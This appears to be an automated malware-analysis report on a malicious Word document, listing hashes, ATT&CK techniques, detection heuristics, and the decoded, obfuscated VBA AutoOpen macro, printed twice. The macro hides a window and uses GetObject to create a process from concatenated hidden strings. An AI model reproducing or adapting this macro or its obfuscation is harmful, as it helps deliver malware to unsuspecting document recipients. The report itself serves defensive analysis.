Office (OLE) malware analysis — malicious · 7d7587e2691d50f7

MALICIOUS

Office (OLE)

159.0 KB Created: 2019-03-21 07:35:00 Authoring application: Microsoft Office Word First seen: 2021-09-17

MD5: 0abc08834a2f282e817e3f44671f1c49 SHA-1: af45f0fea5b2da1397c04c8fc1bde9c8c03f5d70 SHA-256: 7d7587e2691d50f7fe9198d77fde82f47746ab0953a1e8b05eb8b9c321deaf0b

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a Microsoft Office document containing VBA macros, specifically an AutoOpen macro, which is a common technique for initial execution. The GetObject call and the presence of obfuscated VBA p-code suggest an attempt to execute arbitrary code. The ClamAV detection ID 'Doc.Malware.Dsau-6904244-0' further confirms its malicious nature. The VBA script's complexity and obfuscation indicate it likely downloads and executes a second-stage payload.

Heuristics 6

ClamAV: Doc.Malware.Dsau-6904244-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Dsau-6904244-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13054 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13054 bytes
SHA-256: `3700389b011b58bab8b1fab559c8f0f58460c3c27256f6aabb45c2b37f3814d2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZDGQBc" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "sAxoAx" Attribute VB_Base = "0{B00C1D2A-0EC5-4834-BD52-55DCDDDB556B}{E8DB5D3B-4C2A-40DF-A84C-3A33A884B904}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "WDBBAQA" Sub autoopen() On Error Resume Next If SGAQDA = O1U_A4G Then XQBBXB = (354164903) Rkxc1cAD = (uAXZcA_B * Log(185537904 + Atn(90458249 * ZUAAUw_)) + XBwAAA1c + CDbl(PAcGXA - Sqr(UUxABAoA / CBool(619123844 / 648437584) + GoAo_wc - Rnd(lXBQcwAZ))) * 717692923 * 140857080) SD_A1A = (876277793) End If If joxXB_A = zw1kAo Then ABCBXAAU = (907333972) kDDwxZ = (Dw1A1U * Log(906077285 + Atn(939496631 * ABGwAUA)) + Z4DQCDAw + CDbl(wA4A4xA - Sqr(jA11_x / CBool(904290008 / 247771865) + Qc4AA4A - Rnd(TUwAkDZ))) * 104070901 * 407975498) K1GQ4A = (208115342) End If If vAkDw4_ = YXAXAx Then w1DAAAk = (911857544) V_1AAA_ = (iQAwZUU * Log(699515691 + Atn(578272690 * fCwUAZQQ)) + A_AXDQQA + CDbl(lBAUAXAB - Sqr(jQAAA_ / CBool(234002449 / 875593952) + GG_BGDDx - Rnd(joUoAQAQ))) * 484803153 * 720327324) WZX_1x = (386064342) End If Set awcDAXDw = GetObject(ExAADAAB + sAxoAx.E4w_Ak + GZUAB1) If zDBAxA = i1AAAxAw Then BB4ZcQ = (370313042) wxABAAZ = (BoUABGQA * Log(312109724 + Atn(756444821 * wB_xAB)) + UAADAAB + CDbl(TBGwAXX - Sqr(NAABw4A / CBool(175736737 / 990808190) + s41xDA - Rnd(SAABBU))) * 930200640 * 173715715) iD1AA4 = (573405040) End If If howAUx = tcBQA1 Then JUD1Ux4A = (587887753) rCU_ZB = (cUQG4AZZ * Log(697222529 + Atn(285234511 * EAAZADo)) + PBAAcCD + CDbl(EAC4BQU - Sqr(LAZoD1x / CBool(942634415 / 929334407) + KACAAAAA - Rnd(EAxXXUA))) * 480444825 * 68796775) K4GBAU = (230801638) End If If KAxAGDA4 = LDXCAk Then zkBAoGcA = (543619911) vQABAB = (LZQA1AC_ * Log(55987397 + Atn(23136848 * YCA_AX)) + R1ABw_ + CDbl(uZADAwD - Sqr(UAQAwA / CBool(730719312 / 839687655) + z4BACZC - Rnd(iAZAA_BB))) * 984468410 * 611468616) dcAAC4 = (239226092) End If awcDAXDw.ShowWindow = 711727 - 711727 If zQAwQXA = QBc4C_A Then kADBAAA = (450440259) nAwDBcU = (sAUwAw * Log(473041508 + Atn(688292563 * jAZoGAU)) + a1DD__ + CDbl(FQk4AAA - Sqr(OBA4AC4A / CBool(49112116 / 526349501) + bC_QQAc - Rnd(wQAoDAU))) * 20994649 * 425511610) uQBQ_QU = (364955007) End If If XQQUAw = CUAwow Then VAokkBw = (919364621) OGCQDA = (wA_4ZDk * Log(6426374 + Atn(849015688 * TAA4QDA)) + u4QBBA + CDbl(NQAwwD1X - Sqr(GQxkcAZA / CBool(37212185 / 126409053) + WAxGAA4 - Rnd(tUDAAc))) * 179336256 * 152281553) UD1QD1Q4 = (646481162) End If GetObject(wwcBBGA + sAxoAx.cDDAAAxB + HwQAD4UA). _ Create@ pACA_A + sAxoAx.NBwA1D + QcAAADBB + sAxoAx.Z4AkAkZ + pDAXUowA + sAxoAx.wkUQUBZA + YoB1D1_, QZAAAZAQ, awcDAXDw, WAwGAAA_ If wACxAUQ = HcBDQA Then mGAU4Ac_ = (648909886) sD4xBUAC = (a4ADAUk * Log(380977896 + Atn(920961872 * YAGCAA)) + wQZUCAA + CDbl(zUBcCAwD - Sqr(oxBDAxQ / CBool(388970675 / 942189567) + WG4AxD - Rnd(ZAGoAUwA))) * 60028052 * 537514096) sAkQZA_ = (777214553) End If If IAxUDAB = nGBAGw Then SAABAo4 = (613193940) sXAAwUAo = (LAU4xC4w * Log(69644910 + Atn(179403780 * ZCCG1Ak)) + EAAACcD + CDbl(EQAQAwwA - Sqr(NUQAAA / CBool(682560908 / 94327741) + VAAx1AU - Rnd(DcAQwDQD))) * 958521476 * 626994569) NDAAxQU = (677554219) End If If qZDDDA = I4D4cCA Then sUo1CXAQ = (284786612) QG4UoC = (lDwACQAo * Log(537229880 + Atn(964221077 * jXAZDoco)) + cQDUkZxG + CDbl(cDAAAQ - Sqr(KAUBAoQ / CBool(117643941 / 936060523) + wCQQBA - Rnd(LAABBww))) * 148071599 * 533879942) sACZGcA = (967372682) End If End Sub ' Processing file: /opt/analyzer/scan_staging/68e0704921e141ccb8 ... (truncated)

SHA-256: 3700389b011b58bab8b1fab559c8f0f58460c3c27256f6aabb45c2b37f3814d2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZDGQBc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "sAxoAx"
Attribute VB_Base = "0{B00C1D2A-0EC5-4834-BD52-55DCDDDB556B}{E8DB5D3B-4C2A-40DF-A84C-3A33A884B904}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "WDBBAQA"
Sub autoopen()
On Error Resume Next
   If SGAQDA = O1U_A4G Then
   XQBBXB = (354164903)
   Rkxc1cAD = (uAXZcA_B * Log(185537904 + Atn(90458249 * ZUAAUw_)) + XBwAAA1c + CDbl(PAcGXA - Sqr(UUxABAoA / CBool(619123844 / 648437584) + GoAo_wc - Rnd(lXBQcwAZ))) * 717692923 * 140857080)
   SD_A1A = (876277793)
End If
   If joxXB_A = zw1kAo Then
   ABCBXAAU = (907333972)
   kDDwxZ = (Dw1A1U * Log(906077285 + Atn(939496631 * ABGwAUA)) + Z4DQCDAw + CDbl(wA4A4xA - Sqr(jA11_x / CBool(904290008 / 247771865) + Qc4AA4A - Rnd(TUwAkDZ))) * 104070901 * 407975498)
   K1GQ4A = (208115342)
End If
   If vAkDw4_ = YXAXAx Then
   w1DAAAk = (911857544)
   V_1AAA_ = (iQAwZUU * Log(699515691 + Atn(578272690 * fCwUAZQQ)) + A_AXDQQA + CDbl(lBAUAXAB - Sqr(jQAAA_ / CBool(234002449 / 875593952) + GG_BGDDx - Rnd(joUoAQAQ))) * 484803153 * 720327324)
   WZX_1x = (386064342)
End If
Set awcDAXDw = GetObject(ExAADAAB + sAxoAx.E4w_Ak + GZUAB1)
   If zDBAxA = i1AAAxAw Then
   BB4ZcQ = (370313042)
   wxABAAZ = (BoUABGQA * Log(312109724 + Atn(756444821 * wB_xAB)) + UAADAAB + CDbl(TBGwAXX - Sqr(NAABw4A / CBool(175736737 / 990808190) + s41xDA - Rnd(SAABBU))) * 930200640 * 173715715)
   iD1AA4 = (573405040)
End If
   If howAUx = tcBQA1 Then
   JUD1Ux4A = (587887753)
   rCU_ZB = (cUQG4AZZ * Log(697222529 + Atn(285234511 * EAAZADo)) + PBAAcCD + CDbl(EAC4BQU - Sqr(LAZoD1x / CBool(942634415 / 929334407) + KACAAAAA - Rnd(EAxXXUA))) * 480444825 * 68796775)
   K4GBAU = (230801638)
End If
   If KAxAGDA4 = LDXCAk Then
   zkBAoGcA = (543619911)
   vQABAB = (LZQA1AC_ * Log(55987397 + Atn(23136848 * YCA_AX)) + R1ABw_ + CDbl(uZADAwD - Sqr(UAQAwA / CBool(730719312 / 839687655) + z4BACZC - Rnd(iAZAA_BB))) * 984468410 * 611468616)
   dcAAC4 = (239226092)
End If
awcDAXDw.ShowWindow = 711727 - 711727
   If zQAwQXA = QBc4C_A Then
   kADBAAA = (450440259)
   nAwDBcU = (sAUwAw * Log(473041508 + Atn(688292563 * jAZoGAU)) + a1DD__ + CDbl(FQk4AAA - Sqr(OBA4AC4A / CBool(49112116 / 526349501) + bC_QQAc - Rnd(wQAoDAU))) * 20994649 * 425511610)
   uQBQ_QU = (364955007)
End If
   If XQQUAw = CUAwow Then
   VAokkBw = (919364621)
   OGCQDA = (wA_4ZDk * Log(6426374 + Atn(849015688 * TAA4QDA)) + u4QBBA + CDbl(NQAwwD1X - Sqr(GQxkcAZA / CBool(37212185 / 126409053) + WAxGAA4 - Rnd(tUDAAc))) * 179336256 * 152281553)
   UD1QD1Q4 = (646481162)
End If
GetObject(wwcBBGA + sAxoAx.cDDAAAxB + HwQAD4UA). _
Create@ pACA_A + sAxoAx.NBwA1D + QcAAADBB + sAxoAx.Z4AkAkZ + pDAXUowA + sAxoAx.wkUQUBZA + YoB1D1_, QZAAAZAQ, awcDAXDw, WAwGAAA_
   If wACxAUQ = HcBDQA Then
   mGAU4Ac_ = (648909886)
   sD4xBUAC = (a4ADAUk * Log(380977896 + Atn(920961872 * YAGCAA)) + wQZUCAA + CDbl(zUBcCAwD - Sqr(oxBDAxQ / CBool(388970675 / 942189567) + WG4AxD - Rnd(ZAGoAUwA))) * 60028052 * 537514096)
   sAkQZA_ = (777214553)
End If
   If IAxUDAB = nGBAGw Then
   SAABAo4 = (613193940)
   sXAAwUAo = (LAU4xC4w * Log(69644910 + Atn(179403780 * ZCCG1Ak)) + EAAACcD + CDbl(EQAQAwwA - Sqr(NUQAAA / CBool(682560908 / 94327741) + VAAx1AU - Rnd(DcAQwDQD))) * 958521476 * 626994569)
   NDAAxQU = (677554219)
End If
   If qZDDDA = I4D4cCA Then
   sUo1CXAQ = (284786612)
   QG4UoC = (lDwACQAo * Log(537229880 + Atn(964221077 * jXAZDoco)) + cQDUkZxG + CDbl(cDAAAQ - Sqr(KAUBAoQ / CBool(117643941 / 936060523) + wCQQBA - Rnd(LAABBww))) * 148071599 * 533879942)
   sACZGcA = (967372682)
End If
End Sub


' Processing file: /opt/analyzer/scan_staging/68e0704921e141ccb8
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.